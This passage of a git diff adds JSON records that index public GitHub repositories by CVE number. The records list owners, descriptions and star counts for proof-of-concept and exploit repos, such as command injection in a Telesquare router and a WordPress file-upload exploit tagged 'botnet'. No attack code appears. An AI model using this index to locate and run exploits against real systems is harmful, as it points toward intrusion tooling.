+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46417.json b/2021/CVE-2021-46417.json
new file mode 100644
index 0000000000..5ef4182665
--- /dev/null
+++ b/2021/CVE-2021-46417.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 493590968,
+ "name": "CVE-2021-46417",
+ "full_name": "Henry4E36\/CVE-2021-46417",
+ "owner": {
+ "login": "Henry4E36",
+ "id": 41940481,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4",
+ "html_url": "https:\/\/github.com\/Henry4E36"
+ },
+ "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2021-46417",
+ "description": "Franklin Fueling Systems Colibri Controller Module - Local File Inclusion",
+ "fork": false,
+ "created_at": "2022-05-18T09:14:51Z",
+ "updated_at": "2022-05-18T09:18:36Z",
+ "pushed_at": "2022-05-18T09:18:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46422.json b/2021/CVE-2021-46422.json
new file mode 100644
index 0000000000..9591889ca0
--- /dev/null
+++ b/2021/CVE-2021-46422.json
@@ -0,0 +1,452 @@
+[
+ {
+ "id": 495909507,
+ "name": "CVE-2021-46422",
+ "full_name": "nobodyatall648\/CVE-2021-46422",
+ "owner": {
+ "login": "nobodyatall648",
+ "id": 35725871,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4",
+ "html_url": "https:\/\/github.com\/nobodyatall648"
+ },
+ "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2021-46422",
+ "description": "SDT-CW3B1 1.1.0 - OS Command Injection",
+ "fork": false,
+ "created_at": "2022-05-24T16:45:41Z",
+ "updated_at": "2022-05-25T02:23:05Z",
+ "pushed_at": "2022-05-24T17:27:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 505571322,
+ "name": "CVE-2021-46422",
+ "full_name": "Chocapikk\/CVE-2021-46422",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-46422",
+ "description": "Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",
+ "fork": false,
+ "created_at": "2022-06-20T19:24:55Z",
+ "updated_at": "2023-12-19T12:12:24Z",
+ "pushed_at": "2022-10-16T15:20:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 513717270,
+ "name": "CVE-2021-46422_PoC",
+ "full_name": "twoning\/CVE-2021-46422_PoC",
+ "owner": {
+ "login": "twoning",
+ "id": 107823435,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107823435?v=4",
+ "html_url": "https:\/\/github.com\/twoning"
+ },
+ "html_url": "https:\/\/github.com\/twoning\/CVE-2021-46422_PoC",
+ "description": "CVE-2021-46422_PoC",
+ "fork": false,
+ "created_at": "2022-07-14T01:10:18Z",
+ "updated_at": "2022-07-14T01:19:06Z",
+ "pushed_at": "2022-07-14T01:19:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 542332515,
+ "name": "CVE-2021-46422",
+ "full_name": "5l1v3r1\/CVE-2021-46422",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-46422",
+ "description": "Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",
+ "fork": false,
+ "created_at": "2022-09-27T23:52:03Z",
+ "updated_at": "2022-09-27T23:52:02Z",
+ "pushed_at": "2022-06-20T19:26:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 551939049,
+ "name": "CVE-RCE",
+ "full_name": "Awei507\/CVE-RCE",
+ "owner": {
+ "login": "Awei507",
+ "id": 107920786,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107920786?v=4",
+ "html_url": "https:\/\/github.com\/Awei507"
+ },
+ "html_url": "https:\/\/github.com\/Awei507\/CVE-RCE",
+ "description": "CVE-2021-46422漏洞",
+ "fork": false,
+ "created_at": "2022-10-15T12:46:31Z",
+ "updated_at": "2023-07-13T03:06:42Z",
+ "pushed_at": "2022-10-15T13:44:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 551993811,
+ "name": "CVE-2021-46422_RCE",
+ "full_name": "yigexioabai\/CVE-2021-46422_RCE",
+ "owner": {
+ "login": "yigexioabai",
+ "id": 110800918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110800918?v=4",
+ "html_url": "https:\/\/github.com\/yigexioabai"
+ },
+ "html_url": "https:\/\/github.com\/yigexioabai\/CVE-2021-46422_RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-15T15:13:48Z",
+ "updated_at": "2022-10-15T15:14:29Z",
+ "pushed_at": "2022-10-15T15:14:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552255524,
+ "name": "CVE-2021-46422",
+ "full_name": "ZAxyr\/CVE-2021-46422",
+ "owner": {
+ "login": "ZAxyr",
+ "id": 115866621,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115866621?v=4",
+ "html_url": "https:\/\/github.com\/ZAxyr"
+ },
+ "html_url": "https:\/\/github.com\/ZAxyr\/CVE-2021-46422",
+ "description": "SDT-CW3B1韩国的无线路由器 os cmd 注入PoC",
+ "fork": false,
+ "created_at": "2022-10-16T06:52:57Z",
+ "updated_at": "2022-10-16T07:09:44Z",
+ "pushed_at": "2022-10-16T07:09:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552302104,
+ "name": "SDT_CW3B1_rce",
+ "full_name": "xanszZZ\/SDT_CW3B1_rce",
+ "owner": {
+ "login": "xanszZZ",
+ "id": 115653953,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115653953?v=4",
+ "html_url": "https:\/\/github.com\/xanszZZ"
+ },
+ "html_url": "https:\/\/github.com\/xanszZZ\/SDT_CW3B1_rce",
+ "description": "批量检测CVE-2021-46422 RCE漏洞",
+ "fork": false,
+ "created_at": "2022-10-16T09:23:56Z",
+ "updated_at": "2022-10-17T06:36:12Z",
+ "pushed_at": "2022-10-16T15:09:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552307425,
+ "name": "CVE-2021-46422",
+ "full_name": "latings\/CVE-2021-46422",
+ "owner": {
+ "login": "latings",
+ "id": 112951518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112951518?v=4",
+ "html_url": "https:\/\/github.com\/latings"
+ },
+ "html_url": "https:\/\/github.com\/latings\/CVE-2021-46422",
+ "description": "CVE-2021-46422",
+ "fork": false,
+ "created_at": "2022-10-16T09:40:29Z",
+ "updated_at": "2022-10-18T09:07:55Z",
+ "pushed_at": "2022-10-16T09:49:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552330773,
+ "name": "cve-2021-46422",
+ "full_name": "CJ-0107\/cve-2021-46422",
+ "owner": {
+ "login": "CJ-0107",
+ "id": 112550674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112550674?v=4",
+ "html_url": "https:\/\/github.com\/CJ-0107"
+ },
+ "html_url": "https:\/\/github.com\/CJ-0107\/cve-2021-46422",
+ "description": "cve-2021-46422",
+ "fork": false,
+ "created_at": "2022-10-16T10:52:27Z",
+ "updated_at": "2022-10-16T10:53:24Z",
+ "pushed_at": "2022-10-16T10:53:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552333838,
+ "name": "CVE-2021-46422",
+ "full_name": "kelemaoya\/CVE-2021-46422",
+ "owner": {
+ "login": "kelemaoya",
+ "id": 115539074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115539074?v=4",
+ "html_url": "https:\/\/github.com\/kelemaoya"
+ },
+ "html_url": "https:\/\/github.com\/kelemaoya\/CVE-2021-46422",
+ "description": "韩国的无线路由器 os cmd 注入",
+ "fork": false,
+ "created_at": "2022-10-16T11:01:58Z",
+ "updated_at": "2022-10-16T11:07:39Z",
+ "pushed_at": "2022-10-16T11:07:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552344446,
+ "name": "CVE-2021-46422",
+ "full_name": "yyqxi\/CVE-2021-46422",
+ "owner": {
+ "login": "yyqxi",
+ "id": 115715353,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115715353?v=4",
+ "html_url": "https:\/\/github.com\/yyqxi"
+ },
+ "html_url": "https:\/\/github.com\/yyqxi\/CVE-2021-46422",
+ "description": "CVE-2021-46422poc",
+ "fork": false,
+ "created_at": "2022-10-16T11:34:26Z",
+ "updated_at": "2023-02-26T11:45:09Z",
+ "pushed_at": "2022-10-16T11:47:09Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552374583,
+ "name": "CVE-2021-46422-poc",
+ "full_name": "polerstar\/CVE-2021-46422-poc",
+ "owner": {
+ "login": "polerstar",
+ "id": 115876062,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115876062?v=4",
+ "html_url": "https:\/\/github.com\/polerstar"
+ },
+ "html_url": "https:\/\/github.com\/polerstar\/CVE-2021-46422-poc",
+ "description": "漏洞检测",
+ "fork": false,
+ "created_at": "2022-10-16T13:00:59Z",
+ "updated_at": "2022-10-18T09:07:36Z",
+ "pushed_at": "2022-10-16T13:01:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 552430925,
+ "name": "CVE-2021-46422",
+ "full_name": "kailing0220\/CVE-2021-46422",
+ "owner": {
+ "login": "kailing0220",
+ "id": 115863969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4",
+ "html_url": "https:\/\/github.com\/kailing0220"
+ },
+ "html_url": "https:\/\/github.com\/kailing0220\/CVE-2021-46422",
+ "description": "Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。",
+ "fork": false,
+ "created_at": "2022-10-16T15:24:45Z",
+ "updated_at": "2022-10-17T05:39:28Z",
+ "pushed_at": "2022-10-16T15:26:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 653398565,
+ "name": "CVE-2021-46422",
+ "full_name": "tucommenceapousser\/CVE-2021-46422",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2021-46422",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-14T01:35:08Z",
+ "updated_at": "2023-06-14T01:35:23Z",
+ "pushed_at": "2023-06-14T01:35:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46702.json b/2021/CVE-2021-46702.json
new file mode 100644
index 0000000000..73e6a6e9c6
--- /dev/null
+++ b/2021/CVE-2021-46702.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463866526,
+ "name": "CVE-2021-46702",
+ "full_name": "malakkf\/CVE-2021-46702",
+ "owner": {
+ "login": "malakkf",
+ "id": 38157380,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38157380?v=4",
+ "html_url": "https:\/\/github.com\/malakkf"
+ },
+ "html_url": "https:\/\/github.com\/malakkf\/CVE-2021-46702",
+ "description": "Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory.",
+ "fork": false,
+ "created_at": "2022-02-26T13:52:44Z",
+ "updated_at": "2023-08-22T13:40:56Z",
+ "pushed_at": "2022-02-26T14:44:24Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46703.json b/2021/CVE-2021-46703.json
new file mode 100644
index 0000000000..1723187d91
--- /dev/null
+++ b/2021/CVE-2021-46703.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 637333881,
+ "name": "CVE-2021-46703",
+ "full_name": "BenEdridge\/CVE-2021-46703",
+ "owner": {
+ "login": "BenEdridge",
+ "id": 8308258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8308258?v=4",
+ "html_url": "https:\/\/github.com\/BenEdridge"
+ },
+ "html_url": "https:\/\/github.com\/BenEdridge\/CVE-2021-46703",
+ "description": "Simple payload builder",
+ "fork": false,
+ "created_at": "2023-05-07T08:25:37Z",
+ "updated_at": "2023-05-07T11:40:10Z",
+ "pushed_at": "2023-05-08T01:19:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46704.json b/2021/CVE-2021-46704.json
new file mode 100644
index 0000000000..3e06931eb9
--- /dev/null
+++ b/2021/CVE-2021-46704.json
@@ -0,0 +1,69 @@
+[
+ {
+ "id": 656683228,
+ "name": "CVE-2021-46704-POC",
+ "full_name": "MithatGuner\/CVE-2021-46704-POC",
+ "owner": {
+ "login": "MithatGuner",
+ "id": 25469973,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25469973?v=4",
+ "html_url": "https:\/\/github.com\/MithatGuner"
+ },
+ "html_url": "https:\/\/github.com\/MithatGuner\/CVE-2021-46704-POC",
+ "description": "CVE-2021-46704 GenieACS Command Injection POC",
+ "fork": false,
+ "created_at": "2023-06-21T12:29:43Z",
+ "updated_at": "2023-09-19T18:06:55Z",
+ "pushed_at": "2023-06-21T12:34:49Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "acs",
+ "cve-2021-46704",
+ "cwmp",
+ "genieacs",
+ "tr069",
+ "tr181"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 656996292,
+ "name": "CVE-2021-46704",
+ "full_name": "Erenlancaster\/CVE-2021-46704",
+ "owner": {
+ "login": "Erenlancaster",
+ "id": 50498704,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50498704?v=4",
+ "html_url": "https:\/\/github.com\/Erenlancaster"
+ },
+ "html_url": "https:\/\/github.com\/Erenlancaster\/CVE-2021-46704",
+ "description": "CVE-2021-46704 Nuclei template",
+ "fork": false,
+ "created_at": "2023-06-22T05:03:15Z",
+ "updated_at": "2023-06-22T05:03:15Z",
+ "pushed_at": "2023-06-23T20:54:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-521.json b/2021/CVE-2021-521.json
new file mode 100644
index 0000000000..27f37754d2
--- /dev/null
+++ b/2021/CVE-2021-521.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 668395633,
+ "name": "CVE-2021-521-Exploit",
+ "full_name": "NagendraPittu\/CVE-2021-521-Exploit",
+ "owner": {
+ "login": "NagendraPittu",
+ "id": 117686502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117686502?v=4",
+ "html_url": "https:\/\/github.com\/NagendraPittu"
+ },
+ "html_url": "https:\/\/github.com\/NagendraPittu\/CVE-2021-521-Exploit",
+ "description": "Lab Exploit (CVE-2021-521): App uses Java reflection to access Android system components, retrieving a list of all installed apps. Reflection accesses ApplicationPackageManager and PackageManagerService, exploiting vulnerability.",
+ "fork": false,
+ "created_at": "2023-07-19T17:49:46Z",
+ "updated_at": "2023-07-19T17:49:47Z",
+ "pushed_at": "2023-07-19T18:24:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-56789.json b/2021/CVE-2021-56789.json
new file mode 100644
index 0000000000..9542ecf60f
--- /dev/null
+++ b/2021/CVE-2021-56789.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 670731375,
+ "name": "ds-cve-plugin",
+ "full_name": "DataSurgeon-ds\/ds-cve-plugin",
+ "owner": {
+ "login": "DataSurgeon-ds",
+ "id": 140544249,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140544249?v=4",
+ "html_url": "https:\/\/github.com\/DataSurgeon-ds"
+ },
+ "html_url": "https:\/\/github.com\/DataSurgeon-ds\/ds-cve-plugin",
+ "description": "A plugin for DataSurgeon that Extracts CVE Numbers From Text (e.g: CVE-2021-56789)",
+ "fork": false,
+ "created_at": "2023-07-25T17:49:53Z",
+ "updated_at": "2023-07-25T17:52:01Z",
+ "pushed_at": "2023-07-25T18:15:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-6857.json b/2021/CVE-2021-6857.json
new file mode 100644
index 0000000000..001d83a550
--- /dev/null
+++ b/2021/CVE-2021-6857.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 357789319,
+ "name": "CVE-2021-6857",
+ "full_name": "zi0n8\/CVE-2021-6857",
+ "owner": {
+ "login": "zi0n8",
+ "id": 65099918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65099918?v=4",
+ "html_url": "https:\/\/github.com\/zi0n8"
+ },
+ "html_url": "https:\/\/github.com\/zi0n8\/CVE-2021-6857",
+ "description": "Config files for my GitHub profile.",
+ "fork": false,
+ "created_at": "2021-04-14T05:50:48Z",
+ "updated_at": "2021-04-14T05:57:11Z",
+ "pushed_at": "2021-04-14T05:51:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "config",
+ "github-config"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-6901.json b/2021/CVE-2021-6901.json
new file mode 100644
index 0000000000..d411821058
--- /dev/null
+++ b/2021/CVE-2021-6901.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 402380923,
+ "name": "cve-2021-6901",
+ "full_name": "mooneee\/cve-2021-6901",
+ "owner": {
+ "login": "mooneee",
+ "id": 58715815,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58715815?v=4",
+ "html_url": "https:\/\/github.com\/mooneee"
+ },
+ "html_url": "https:\/\/github.com\/mooneee\/cve-2021-6901",
+ "description": "readme",
+ "fork": false,
+ "created_at": "2021-09-02T10:33:35Z",
+ "updated_at": "2021-09-02T10:34:07Z",
+ "pushed_at": "2021-09-02T10:33:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-0316.json b/2022/CVE-2022-0316.json
new file mode 100644
index 0000000000..5e8778548c
--- /dev/null
+++ b/2022/CVE-2022-0316.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 599217584,
+ "name": "CVE-2022-0316_wordpress_multiple_themes_exploit",
+ "full_name": "KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit",
+ "owner": {
+ "login": "KTN1990",
+ "id": 33407405,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4",
+ "html_url": "https:\/\/github.com\/KTN1990"
+ },
+ "html_url": "https:\/\/github.com\/KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit",
+ "description": "( Wordpress Exploit ) Wordpress Multiple themes - Unauthenticated Arbitrary File Upload",
+ "fork": false,
+ "created_at": "2023-02-08T17:37:09Z",
+ "updated_at": "2024-06-01T21:11:00Z",
+ "pushed_at": "2023-02-09T15:59:30Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bot",
+ "botnet",
+ "exploit",
+ "hack",
+ "hacking",
+ "pentest",
+ "pentest-tool",
+ "shell"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-0337.json b/2022/CVE-2022-0337.json
index 1fe566a0e2..378918e883 100644
--- a/2022/CVE-2022-0337.json
+++ b/2022/CVE-2022-0337.json
@@ -45,6 +45,36 @@
"score": 0,
"subscribers_count": 6
},
+ {
+ "id": 608127887,
+ "name": "ChExp-CVE-2022-0337-",
+ "full_name": "maldev866\/ChExp-CVE-2022-0337-",
+ "owner": {
+ "login": "maldev866",
+ "id": 118355132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118355132?v=4",
+ "html_url": "https:\/\/github.com\/maldev866"
+ },
+ "html_url": "https:\/\/github.com\/maldev866\/ChExp-CVE-2022-0337-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-01T11:31:45Z",
+ "updated_at": "2023-03-01T11:33:31Z",
+ "pushed_at": "2023-03-01T11:33:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 721416376,
"name": "CVE-2022-0337-RePoC",
diff --git a/2022/CVE-2022-0435.json b/2022/CVE-2022-0435.json
new file mode 100644
index 0000000000..d8fc0594a0
--- /dev/null
+++ b/2022/CVE-2022-0435.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 630581068,
+ "name": "CVE-2022-0435",
+ "full_name": "wlswotmd\/CVE-2022-0435",
+ "owner": {
+ "login": "wlswotmd",
+ "id": 80761172,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4",
+ "html_url": "https:\/\/github.com\/wlswotmd"
+ },
+ "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-0435",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-20T17:29:02Z",
+ "updated_at": "2023-07-03T13:45:44Z",
+ "pushed_at": "2023-04-26T09:45:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-0439.json b/2022/CVE-2022-0439.json
new file mode 100644
index 0000000000..f06e419536
--- /dev/null
+++ b/2022/CVE-2022-0439.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 651257016,
+ "name": "CVE-2022-0439",
+ "full_name": "RandomRobbieBF\/CVE-2022-0439",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-0439",
+ "description": "CVE-2022-0439 - Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection",
+ "fork": false,
